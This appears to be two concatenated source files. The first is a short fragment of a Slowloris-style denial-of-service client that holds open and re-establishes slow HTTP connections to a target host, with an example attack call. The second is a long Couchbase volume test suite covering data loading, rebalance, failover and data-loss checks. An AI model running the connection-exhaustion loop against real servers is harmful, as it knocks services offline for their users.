connection_count = len(target.connections)
# Roughly every 5 seconds (driven by keep_alive above), send a little more HTTP data to prevent the connection from timing out.
for i in range(0, connection_count):
try:
target.connections[i].keep_alive()
# If the server closed one of our connections,
# re-open the connection in its place.
except: # pylint: disable=bare-except
# Notify the user that the host started dropping connections
# if this connection was the first one being dropped.
if target.dropped_connections == 0:
print("[{}] Server started dropping connections.".format(target.host))
target.dropped_connections += 1
# Notify the user about the amount of reconnections.
threshold = 10
if target.reconnections >= threshold:
print("[{}] Reconnected {} dropped connections."
.format(target.host, target.reconnections))
target.reconnections = 0
# Reconnect the socket.
conn = LorisConnection(target).send_headers(get_random_user_agent())
if conn.is_connected:
target.connections[i] = conn
target.reconnections += 1
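# Example usage (sketch; assumes a target object exposing the attributes used above --
# host, count, connections, dropped_connections, reconnections and get_latency()):
#
#     client = LorisClient()
#     client.attack(target)   # opens `target.count` slow connections
#     ...                     # the daemon keep-alive thread maintains them in the background
#     client.stop()           # closes every connection on shutdown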
|
volume.py
|
from threading import Thread
import threading
from lib.testconstants import STANDARD_BUCKET_PORT
from couchbase_helper.document import DesignDocument, View
from basetestcase import BaseTestCase
from rebalance.rebalance_base import RebalanceBaseTest
from membase.api.rest_client import RestConnection, RestHelper
class VolumeTests(BaseTestCase):
def setUp(self):
super(VolumeTests, self).setUp()
self.zone = self.input.param("zone", 1)
self.recoveryType = self.input.param("recoveryType", "full")
self.ddocs = []
self.default_view_name = "upgrade-test-view"
self.ddocs_num = self.input.param("ddocs-num", 0)
self.view_num = self.input.param("view-per-ddoc", 2)
self.is_dev_ddoc = self.input.param("is-dev-ddoc", False)
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 10000)
self.doc_size = self.input.param("doc_size", 100)
self.loader = self.input.param("loader", "pillowfight")
self.instances = self.input.param("instances", 1)
self.node_out = self.input.param("node_out", 0)
self.threads = self.input.param("threads", 5)
self.use_replica_to = self.input.param("use_replica_to",False)
self.reload_size = self.input.param("reload_size",50000)
self.initial_load= self.input.param("initial_load",10000)
def tearDown(self):
super(VolumeTests, self).tearDown()
def load(self, server, items, bucket,start_at=0,batch=1000):
import subprocess
from lib.testconstants import COUCHBASE_FROM_SPOCK
rest = RestConnection(server)
num_cycles = int((items / batch )) / 5
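# Build a cbc-pillowfight command that writes `items` JSON documents of 10-100 bytes in
# batches of `batch`, with key numbering starting at `start_at`
# (-I items, -m/-M min/max doc size, -B batch size, --populate-only for a store-only load).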
cmd = "cbc-pillowfight -U couchbase://{0}/{3} -I {1} -m 10 -M 100 -B {2} --populate-only --start-at {4} --json".format(server.ip, items, batch,bucket,start_at)
if rest.get_nodes_version()[:5] in COUCHBASE_FROM_SPOCK:
cmd += " -u Administrator -P password"
self.log.info("Executing '{0}'...".format(cmd))
rc = subprocess.call(cmd, shell=True)
if rc != 0:
self.fail("Exception running cbc-pillowfight: subprocess module returned non-zero response!")
def check_dataloss(self, server, bucket, num_items):
from couchbase.bucket import Bucket
from couchbase.exceptions import NotFoundError,CouchbaseError
from lib.memcached.helper.data_helper import VBucketAwareMemcached
self.log.info("########## validating data for bucket : {} ###########".format(bucket))
cb_version = RestConnection(server).get_nodes_version()[:3]
if cb_version < "5":
bkt = Bucket('couchbase://{0}/{1}'.format(server.ip, bucket.name),timeout=5000)
else:
bkt = Bucket('couchbase://{0}/{1}'.format(server.ip, bucket.name),username=server.rest_username,
password=server.rest_password,timeout=5000)
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
batch_start = 0
batch_end = 0
batch_size = 10000
errors = []
while num_items > batch_end:
batch_end = min(batch_start + batch_size, num_items)
keys = []
for i in xrange(batch_start, batch_end, 1):
keys.append(str(i).rjust(20, '0'))
try:
bkt.get_multi(keys)
self.log.info("Able to fetch keys starting from {0} to {1}".format(keys[0], keys[len(keys) - 1]))
except CouchbaseError as e:
self.log.error(e)
ok, fail = e.split_results()
if fail:
for key in fail:
try:
bkt.get(key)
except NotFoundError:
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append("Missing key: {0}, VBucketId: {1}".
format(key, vBucketId))
batch_start += batch_size
self.log.info("Total missing keys:{}".format(len(errors)))
self.log.info(errors)
return errors
def create_ddocs_and_views(self):
self.default_view = View(self.default_view_name, None, None)
for bucket in self.buckets:
for i in xrange(int(self.ddocs_num)):
views = self.make_default_views(self.default_view_name, self.view_num,
self.is_dev_ddoc, different_map=True)
ddoc = DesignDocument(self.default_view_name + str(i), views)
self.ddocs.append(ddoc)
for view in views:
self.cluster.create_view(self.master, ddoc.name, view, bucket=bucket)
def test_volume_with_rebalance(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
#load initial documents
self.create_ddocs_and_views()
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items,b)))
for t in load_thread:
t.start()
servers_init = self.servers[:self.nodes_init]
new_server_list=self.servers[0:self.nodes_init]
for t in load_thread:
t.join()
self.sleep(30)
#Reload more data for mutations
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items,b,self.num_items)))
for t in load_thread:
t.start()
# #Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*2)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b,self.num_items*2)))
for t in load_thread:
t.start()
#rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init]+ servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out=[self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init,[],
servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*3)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*3)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list)- set(servers_out))
#swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init : self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1) : self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
self.sleep(30)
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*4)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*4)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - set([self.master]))[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*5)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*5)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
#Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - set([self.master]))[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*6)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*6)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
#Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*7)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*7)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
#Rebalance out 4 nodes
servers_out = list(set(new_server_list) - set([self.master]))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*8)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*8)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info("======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
#Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*9)
self.sleep(30)
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items * 9)))
for t in load_thread:
t.start()
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*10)
self.sleep(30)
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items * 10)))
for t in load_thread:
t.start()
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
#Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*11)
self.sleep(30)
def test_volume_with_high_ops(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at=0
total_doc=self.num_items
#load initial documents
self.create_ddocs_and_views()
load_thread=[]
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master,bk, self.num_items,
self.batch_size, self.threads, start_at,self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
start_at=total_doc
#Reload more data for mutations
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops,
args=(self.master,b, self.num_items,
self.batch_size, self.threads, start_at,self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
servers_init = self.servers[:self.nodes_init]
# #Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,total_doc,batch=self.batch_size,instances=self.instances)
# Reload more data for mutations
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops,
args=(self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# Reload more data for mutations
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - set([self.master]))[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - set([self.master]))[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - set([self.master]))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
self.log.info("####### Shuffling zones and rebalance #######")
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at = self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at = self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
self.sleep(30)
def test_volume_with_high_ops_update(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
total_doc = self.num_items
updated=1
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
#Update all data
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master,b, total_doc,total_doc,
self.batch_size, self.threads, start_at,self.instances,updated)))
for t in load_thread:
t.start()
servers_init = self.servers[:self.nodes_init]
#Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
for t in load_thread:
t.join()
#total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,total_doc,updated=True,ops=total_doc,
batch=self.batch_size, instances=self.instances)
updated +=1
#Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,updated)))
for t in load_thread:
t.start()
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc*updated,batch=self.batch_size,instances=self.instances)
updated +=1
#Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc*updated,batch=self.batch_size,instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - set([self.master]))[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated,batch=self.batch_size,instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - set([self.master]))[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated,batch=self.batch_size,instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated,batch=self.batch_size,instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - set([self.master]))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("####### Shuffling zones and rebalance #######")
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
def test_volume_with_high_ops_create_update(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.initial_load, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load,batch=self.batch_size,instances=self.instances)
self.sleep(30)
total_doc = self.initial_load
start_at=total_doc
#Update initial doc and create more doc
load_thread=[]
create_thread=[]
updated=1
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master,b, self.initial_load,self.initial_load,
self.batch_size, self.threads, 0,self.instances,updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc +=self.num_items
start_at=total_doc
updated +=1
servers_init = self.servers[:self.nodes_init]
#Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
